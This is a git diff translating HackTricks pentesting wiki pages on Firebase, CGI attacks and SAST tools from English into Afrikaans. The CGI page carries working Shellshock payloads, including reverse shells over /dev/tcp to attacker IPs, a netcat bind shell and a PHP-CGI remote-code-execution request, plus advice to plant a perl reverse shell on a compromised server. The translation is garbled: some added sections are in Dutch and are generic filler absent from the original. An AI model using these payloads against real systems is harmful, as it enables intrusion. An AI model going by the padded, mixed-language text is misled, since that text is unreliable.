[**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/network-services-pentesting/pentesting-web/buckets/firebase-database.md index 231495bd1..10fa57528 100644 --- a/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -1,33 +1,33 @@ -# Firebase Database +# Firebase Databasis
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## What is Firebase +## Wat is Firebase -Firebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end. +Firebase is 'n Backend-as-a-Service wat hoofsaaklik vir mobiele toepassings gebruik word. Dit fokus daarop om die las van die programmering van die agterkant te verwyder deur 'n mooi SDK sowel as baie ander interessante dinge te bied wat die interaksie tussen die toepassing en die agterkant vergemaklik. -Learn more about Firebase in: +Leer meer oor Firebase by: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-web/cgi.md b/network-services-pentesting/pentesting-web/cgi.md index 7aaa163a8..18314b6d4 100644 --- a/network-services-pentesting/pentesting-web/cgi.md +++ b/network-services-pentesting/pentesting-web/cgi.md @@ -1,45 +1,56 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Information +# Inligting -The **CGI scripts are perl scripts**, so, if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **change the extension** from **.pl** to **.cgi**, give **execute permissions** \(`chmod +x`\) and **access** the reverse shell **from the web browser** to execute it. -In order to test for **CGI vulns** it's recommended to use `nikto -C all` \(and all the plugins\) +Die **CGI-skripte is perl-skripte**, so as jy 'n bediener gekompromitteer het wat _**.cgi**_ skripte kan uitvoer, kan jy 'n perl-omgekeerde dop **oplaai** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), die **uitbreiding verander** van **.pl** na **.cgi**, **uitvoerregte gee** \(`chmod +x`\) en die omgekeerde dop **vanaf die webblaaier toegang** om dit uit te voer. +Om te toets vir **CGI-gebreke**, word dit aanbeveel om `nikto -C all` \(en al die invoegtoepassings\) te gebruik. # **ShellShock** -**ShellShock** is a **vulnerability** that affects the widely used **Bash** command-line shell in Unix-based operating systems. It targets the ability of Bash to run commands passed by applications. The vulnerability lies in the manipulation of **environment variables**, which are dynamic named values that impact how processes run on a computer. Attackers can exploit this by attaching **malicious code** to environment variables, which is executed upon receiving the variable. This allows attackers to potentially compromise the system. +**ShellShock** is 'n **kwesbaarheid** wat die wyd gebruikte **Bash** opdraglyn-skulp in Unix-gebaseerde bedryfstelsels affekteer. Dit teiken die vermoë van Bash om opdragte uit te voer wat deur aansoeke oorgedra word. Die kwesbaarheid lê in die manipulasie van **omgewingsveranderlikes**, wat dinamiese benoemde waardes is wat impak het op hoe prosesse op 'n rekenaar uitgevoer word. 
Aanvallers kan dit uitbuit deur **skadelike kode** aan omgewingsveranderlikes te heg, wat uitgevoer word wanneer die veranderlike ontvang word. Dit stel aanvallers in staat om moontlik die stelsel te kompromitteer. -Exploiting this vulnerability the **page could throw an error**. +Deur hierdie kwesbaarheid te misbruik, kan die **bladsy 'n fout gooi**. -You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**. +Jy kan hierdie kwesbaarheid **vind** deur op te let dat dit 'n **ou Apache-weergawe** en **cgi\_mod** \(met cgi-lys\) gebruik of deur **nikto** te gebruik. -## **Test** +## **Toets** -Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them. +Die meeste toetse is gebaseer op die uitvoer van 'n string en verwag dat daardie string in die web-terugvoer teruggegee word. As jy dink 'n bladsy mag kwesbaar wees, soek na al die cgi-bladsye en toets hulle. **Nmap** - ```bash nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi ``` +## **Curl \(weerspieëlde, blinde en out-of-band\)** -## **Curl \(reflected, blind and out-of-band\)** +Curl is 'n nuttige hulpmiddel wat gebruik kan word vir die toetsing van CGI-skripsies. Dit kan gebruik word om HTTP-aanvrae na 'n webbediener te stuur en die respons te ontleed. Hier is 'n paar maniere waarop Curl gebruik kan word vir die toetsing van CGI-skripsies: weerspieëlde, blinde en out-of-band aanvalle. +### Weerspieëlde aanvalle + +By 'n weerspieëlde aanval word die aanvallersinvoer direk in die HTTP-aanvraag ingesluit. Die webbediener sal die invoer dan verwerk en die uitset sal in die HTTP-respons teruggegee word. Dit kan gebruik word om te kyk of daar enige kwesbaarhede in die CGI-skripsie is wat die aanvaller kan uitbuit. 
+ +### Blinde aanvalle + +By 'n blinde aanval word die aanvallersinvoer nie direk in die HTTP-respons ingesluit nie. In plaas daarvan sal die aanvaller 'n manier moet vind om die uitset van die aanvraag op 'n ander manier te ondersoek. Dit kan gedoen word deur te kyk na veranderinge in die gedrag van die webbediener of deur die aanvraag na 'n ander kanaal te stuur, soos 'n e-pos of 'n loglêer. + +### Out-of-band aanvalle + +By 'n out-of-band aanval word die aanvallersinvoer gebruik om 'n ander tipe kommunikasie te inisieer, soos DNS- of HTTP-aanvrae na 'n eksterne bediener. Die aanvaller kan dan die respons van hierdie aanvrae gebruik om inligting te verkry of verdere aanvalle uit te voer. + +Curl is 'n kragtige hulpmiddel wat verskeie aanvalstegnieke ondersteun. Dit kan gebruik word om CGI-skripsies te toets vir kwesbaarhede en om die veiligheid van 'n webtoepassing te verbeter. ```bash # Reflected curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE' 
@@ -48,15 +59,45 @@ curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bi # Out-Of-Band Use Cookie as alternative to User-Agent curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh ``` - [**Shellsocker**](https://github.com/liamim/shellshocker) - ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` +## Uitbuiting -## Exploit +Om een CGI-kwetsbaarheid uit te buiten, moet je eerst de kwetsbaarheid identificeren en begrijpen hoe deze kan worden misbruikt. Hier zijn enkele veelvoorkomende methoden om CGI-kwetsbaarheden uit te buiten: +### Command Injection + +Bij command injection maak je gebruik van het feit dat de invoer van de gebruiker direct wordt doorgegeven aan het besturingssysteem. Je kunt kwaadaardige commando's invoeren om opdrachten uit te voeren op de server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem. + +### Path Traversal + +Bij path traversal maak je gebruik van het feit dat de CGI-toepassing bestanden op de server kan lezen. Je kunt speciale tekens gebruiken om de bestandsnaam te manipuleren en toegang te krijgen tot bestanden buiten de beoogde directory. Dit kan leiden tot het lekken van gevoelige informatie of het uitvoeren van ongeautoriseerde acties. + +### File Inclusion + +Bij file inclusion maak je gebruik van het feit dat de CGI-toepassing externe bestanden kan opnemen. Je kunt speciale tekens gebruiken om een externe URL op te geven en kwaadaardige code uit te voeren vanaf een externe server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem. + +### Denial of Service (DoS) + +Bij een Denial of Service-aanval maak je gebruik van het feit dat de CGI-toepassing kwetsbaar is voor overbelasting. 
Je kunt een groot aantal verzoeken naar de server sturen om de server te overbelasten en onbeschikbaar te maken voor legitieme gebruikers. + +### Remote Code Execution (RCE) + +Bij Remote Code Execution maak je gebruik van het feit dat de CGI-toepassing externe code kan uitvoeren. Je kunt kwaadaardige code invoeren om opdrachten uit te voeren op de server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem. + +### SQL Injection + +Bij SQL Injection maak je gebruik van het feit dat de CGI-toepassing onvoldoende sanitizing uitvoert op SQL-query's. Je kunt kwaadaardige SQL-instructies invoeren om de database te manipuleren, gevoelige informatie te verkrijgen of toegang te krijgen tot het systeem. + +### Cross-Site Scripting (XSS) + +Bij Cross-Site Scripting maak je gebruik van het feit dat de CGI-toepassing onvoldoende sanitizing uitvoert op gebruikersinvoer. Je kunt kwaadaardige scripts invoeren die worden uitgevoerd in de browser van andere gebruikers. Dit kan leiden tot het stelen van sessiecookies, het uitvoeren van phishing-aanvallen of het verkrijgen van toegang tot gevoelige informatie. + +### Remote File Inclusion (RFI) + +Bij Remote File Inclusion maak je gebruik van het feit dat de CGI-toepassing externe bestanden kan opnemen. Je kunt speciale tekens gebruiken om een externe URL op te geven en kwaadaardige code uit te voeren vanaf een externe server. Dit kan leiden tot het uitvoeren van willekeurige code, het verkrijgen van gevoelige informatie of het verkrijgen van toegang tot het systeem. ```bash #Bind Shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8 
@@ -70,42 +111,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > set rhosts 10.1.2.11 > run ``` +# **Proxy (MitM na Web-bedienerversoeke)** -# **Proxy \(MitM to Web server requests\)** +CGI skep 'n omgewingsveranderlike vir elke kop in die HTTP-versoek. Byvoorbeeld: "host: web.com" word geskep as "HTTP_HOST" = "web.com" -CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP\_HOST"="web.com" +Aangesien die HTTP_PROXY-veranderlike deur die web-bediener gebruik kan word. Probeer om 'n **kop** te stuur wat "**Proxy: <IP_aanvaller>:<POORT>**" bevat en as die bediener enige versoek gedurende die sessie uitvoer. Jy sal in staat wees om elke versoek wat deur die bediener gemaak word, vas te vang. -As the HTTP\_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP\_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. +# Oue PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311) -# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) - -Basically if cgi is active and php is "old" \(<5.3.12 / < 5.4.2\) you can execute code. -In order t exploit this vulnerability you need to access some PHP file of the web server without sending parameters \(specially without sending the character "="\). -Then, in order to test this vulnerability, you could access for example `/index.php?-s` \(note the `-s`\) and **source code of the application will appear in the response**. - -Then, in order to obtain **RCE** you can send this special query: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` and the **PHP code** to be executed in the **body of the request. -Example:** +Basies, as cgi aktief is en php "oud" is (<5.3.12 / < 5.4.2), kan jy kode uitvoer. 
+Om van hierdie kwesbaarheid gebruik te maak, moet jy toegang verkry tot 'n PHP-lêer van die web-bediener sonder om parameters te stuur (veral sonder om die karakter "=" te stuur). +Daarna, om hierdie kwesbaarheid te toets, kan jy byvoorbeeld `/index.php?-s` (let op die `-s`) toegang en die **bronkode van die toepassing sal in die respons verskyn**. +Daarna kan jy, om **RCE** te verkry, hierdie spesiale navraag stuur: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` en die **PHP-kode** wat in die **liggaam van die versoek uitgevoer moet word. +Voorbeeld: ```bash curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" ``` - -**More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +**Meer inligting oor die kwesbaarheid en moontlike aanvalle:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Voorbeeld**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositorium.
- - diff --git a/network-services-pentesting/pentesting-web/code-review-tools.md b/network-services-pentesting/pentesting-web/code-review-tools.md index 2227119a2..86ff3f504 100644 --- a/network-services-pentesting/pentesting-web/code-review-tools.md +++ b/network-services-pentesting/pentesting-web/code-review-tools.md @@ -1,43 +1,43 @@ -# Source code Review / SAST Tools +# Bronkode-oorsig / SAST-hulpmiddels
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Guidance and & Lists of tools +## Leiding en lys van hulpmiddels * [**https://owasp.org/www-community/Source\_Code\_Analysis\_Tools**](https://owasp.org/www-community/Source\_Code\_Analysis\_Tools) * [**https://github.com/analysis-tools-dev/static-analysis**](https://github.com/analysis-tools-dev/static-analysis) -## Multi-Language Tools +## Veeltalige hulpmiddels ### [Naxus - AI-Gents](https://www.naxusai.com/) -There is a **free package to review PRs**. +Daar is 'n **gratis pakket om PR's te oorsien**. ### [**Semgrep**](https://github.com/returntocorp/semgrep) -It's an **Open Source tool**. +Dit is 'n **Open Source-hulpmiddel**. -#### Supported Languages +#### Ondersteunde tale -| Category | Languages | +| Kategorie | Tale | | ------------ | ----------------------------------------------------------------------------------------------------- | | GA | C# · Go · Java · JavaScript · JSX · JSON · PHP · Python · Ruby · Scala · Terraform · TypeScript · TSX | | Beta | Kotlin · Rust | | Experimental | Bash · C · C++ · Clojure · Dart · Dockerfile · Elixir · HTML · Julia · Jsonnet · Lisp · | -#### Quick Start +#### Vinnige Begin {% code overflow="wrap" %} ```bash @@ -50,13 +50,13 @@ semgrep scan --config auto ``` {% endcode %} -You can also use the [**semgrep VSCode Extension**](https://marketplace.visualstudio.com/items?itemName=Semgrep.semgrep) to get the findings inside VSCode. +Jy kan ook die [**semgrep VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=Semgrep.semgrep) gebruik om die bevindinge binne VSCode te kry. ### [**SonarQube**](https://www.sonarsource.com/products/sonarqube/downloads/) -There is an installable **free version**. +Daar is 'n installeerbare **gratis weergawe**. -#### Quick Start +#### Vinnige Begin {% code overflow="wrap" %} ```bash 
@@ -71,18 +71,18 @@ brew install sonar-scanner # Using the token and from the folder with the repo, scan it cd path/to/repo sonar-scanner \ - -Dsonar.projectKey= \ - -Dsonar.sources=. \ - -Dsonar.host.url=http://localhost:9000 \ - -Dsonar.token= +-Dsonar.projectKey= \ +-Dsonar.sources=. \ +-Dsonar.host.url=http://localhost:9000 \ +-Dsonar.token= ``` {% endcode %} ### CodeQL -There is an **installable free version** but according to the license you can **only use free codeQL version in Open Source projects**. +Daar is 'n **installeerbare gratis weergawe**, maar volgens die lisensie kan jy die **gratis CodeQL-weergawe slegs in Open Source projekte gebruik**. -#### Install +#### Installeer {% code overflow="wrap" %} ```bash @@ -108,13 +108,13 @@ codeql resolve qlpacks #Get paths to QL packs ``` {% endcode %} -#### Quick Start - Prepare the database +#### Vinnige Begin - Maak die databasis gereed {% hint style="success" %} -The first thing you need to do is to **prepare the database** (create the code tree) so later the queries are run over it. +Die eerste ding wat jy moet doen is om die databasis gereed te maak (skep die kodeboom) sodat die navrae later daaroor uitgevoer kan word. {% endhint %} -* You can allow codeql to automatically identify the language of the repo and create the database +* Jy kan codeql toelaat om outomaties die taal van die repo te identifiseer en die databasis te skep {% code overflow="wrap" %} ```bash 
@@ -127,12 +127,10 @@ codeql database create /path/repo/codeql_db --source-root /path/repo {% endcode %} {% hint style="danger" %} -This **will usually trigger and error** saying that more than one language was specified (or automatically detected). **Check the next options** to fix this! +Dit sal gewoonlik 'n fout veroorsaak wat sê dat meer as een taal gespesifiseer is (of outomaties opgespoor is). Kyk na die volgende opsies om dit reg te stel! {% endhint %} -* You can do this **manually indicating** the **repo** and the **language** ([list of languages](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/preparing-your-code-for-codeql-analysis#running-codeql-database-create)) - -{% code overflow="wrap" %} +* Jy kan dit **handmatig aandui** deur die **repo** en die **taal** ([lys van tale](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/preparing-your-code-for-codeql-analysis#running-codeql-database-create)) ```bash codeql database create --language --source-root @@ -142,7 +140,7 @@ codeql database create /path/repo/codeql_db --language javascript --source-root ``` {% endcode %} -* If your repo is using **more than 1 language**, you can also create **1 DB per language** indicating each language. +* As jou repo **meer as 1 taal** gebruik, kan jy ook **1 DB per taal** skep wat elke taal aandui. {% code overflow="wrap" %} ```bash @@ -156,7 +154,7 @@ codeql database create /path/repo/codeql_db --source-root /path/to/repo --db-clu ``` {% endcode %} -* You can also allow `codeql` to **identify all the languages** for you and create a DB per language. You need to give it a **GITHUB\_TOKEN**. +* Jy kan ook `codeql` toelaat om **alle tale te identifiseer** en 'n databasis per taal te skep. Jy moet dit 'n **GITHUB\_TOKEN** gee. {% code overflow="wrap" %} ```bash 
@@ -170,13 +168,13 @@ codeql database create /tmp/codeql_db --db-cluster --source-root /path/repo ``` {% endcode %} -#### Quick Start - Analyze the code +#### Vinnige Begin - Ontleed die kode {% hint style="success" %} -Now it's finally time to analyze the code +Nou is dit eindelik tyd om die kode te ontleed {% endhint %} -Remember that if you used several languages, **a DB per language** would have been crated in the path you specified. +Onthou dat as jy verskeie tale gebruik het, **'n DB per taal** in die pad wat jy gespesifiseer het, geskep sou wees. {% code overflow="wrap" %} ```bash @@ -187,18 +185,18 @@ codeql database analyze /tmp/codeql_db/javascript --format=sarif-latest --output # Specify QL pack to use in the analysis codeql database analyze \ - --sarif-category= \ - --sarif-add-baseline-file-info \ --format= \ - --output=/out/file/path> + --sarif-category= \ +--sarif-add-baseline-file-info \ --format= \ +--output=/out/file/path> # Example codeql database analyze /tmp/codeql_db \ - javascript-security-extended --sarif-category=javascript \ - --sarif-add-baseline-file-info --format=sarif-latest \ - --output=/tmp/sec-extended.sarif +javascript-security-extended --sarif-category=javascript \ +--sarif-add-baseline-file-info --format=sarif-latest \ +--output=/tmp/sec-extended.sarif ``` {% endcode %} -#### Quick Start - Scripted +#### Vinnige Begin - Geskript {% code overflow="wrap" %} ```bash 
@@ -211,26 +209,25 @@ export FINAL_MSG="Results available in: " echo "Creating DB" codeql database create "$REPO_PATH/codeql_db" --db-cluster --source-root "$REPO_PATH" for db in `ls "$REPO_PATH/codeql_db"`; do - echo "Analyzing $db" - codeql database analyze "$REPO_PATH/codeql_db/$db" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db).sarif" - FINAL_MSG="$FINAL_MSG ${OUTPUT_DIR_PATH}/$db.sarif ," - echo "" +echo "Analyzing $db" +codeql database analyze "$REPO_PATH/codeql_db/$db" --format=sarif-latest --output="${OUTPUT_DIR_PATH}/$db).sarif" +FINAL_MSG="$FINAL_MSG ${OUTPUT_DIR_PATH}/$db.sarif ," +echo "" done echo $FINAL_MSG ``` {% endcode %} -You can visualize the findings in [**https://microsoft.github.io/sarif-web-component/**](https://microsoft.github.io/sarif-web-component/) or using VSCode extension [**SARIF viewer**](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer). +Jy kan die bevindinge visualiseer in [**https://microsoft.github.io/sarif-web-component/**](https://microsoft.github.io/sarif-web-component/) of deur die gebruik van die VSCode-uitbreiding [**SARIF viewer**](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer). -You can also use the [**VSCode extension**](https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql) to get the findings inside VSCode. You will still need to create a database manually, but then you can select any files and click on `Right Click` -> `CodeQL: Run Queries in Selected Files` +Jy kan ook die [**VSCode-uitbreiding**](https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql) gebruik om die bevindinge binne VSCode te kry. Jy sal steeds 'n databasis handmatig moet skep, maar dan kan jy enige lêers kies en klik op `Right Click` -> `CodeQL: Run Queries in Selected Files` ### 